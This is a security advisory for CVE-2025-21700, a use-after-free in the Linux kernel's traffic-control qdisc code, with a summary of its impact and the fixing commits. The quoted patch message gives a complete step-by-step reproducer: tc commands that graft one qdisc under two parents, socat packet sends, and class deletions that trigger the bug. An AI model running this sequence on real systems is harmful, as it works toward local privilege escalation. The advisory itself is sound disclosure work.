CVE-2025-21700
Published: 13 February 2025
Description
In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12. send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001)) step13. send one packet to the grafted fifo echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config". Joint work with Lion Ackermann <nnamrec@gmail.com>
Security Summary
CVE-2025-21700 is a use-after-free (UAF) vulnerability in the Linux kernel's networking scheduler subsystem (net/sched), specifically related to traffic control queueing disciplines (qdiscs). The issue arises from allowing the replacement of a child qdisc from one parent class to another, which leads to incorrect reference counting and multiple parents pointing to the same qdisc. This affects Linux kernel versions prior to the application of the fixing patches, particularly systems using the tc (traffic control) utility for configuring qdiscs and classes on network devices.
A local attacker with low privileges can exploit this vulnerability by executing a sequence of tc commands to set up a root qdisc, multiple classes, and nested child qdiscs, then performing a replace operation that moves a qdisc (e.g., handle 4:0) from one parent (3:1) to another (1:3). This results in elevated reference counts and dual parenting, enabling a UAF when packets are sent through the affected qdiscs (using tools like socat with specific priorities) followed by class deletions. Successful exploitation allows arbitrary code execution, leading to privilege escalation, with a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and classification under CWE-416.
The kernel patches, available in stable repositories, mitigate the issue by disallowing qdisc replacement across different parents, enforcing that replace operations occur only on the same node to prevent invalid configurations. Relevant commits include 38646749d6e12f9d80a08d21ca39f0beca20230d, 46c59ec33ec98aba20c15117630cae43a01404cc, 73c7e1d6898ccbeee126194dcc05f58b8a795e70, 7e2bd8c13b07e29a247c023c7444df23f9a79fd8, and bc50835e83f60f56e9bec2b392fb5544f250fb6f, which implement this preventive restriction as a joint fix with contributor Lion Ackermann.
Details
- CWE(s)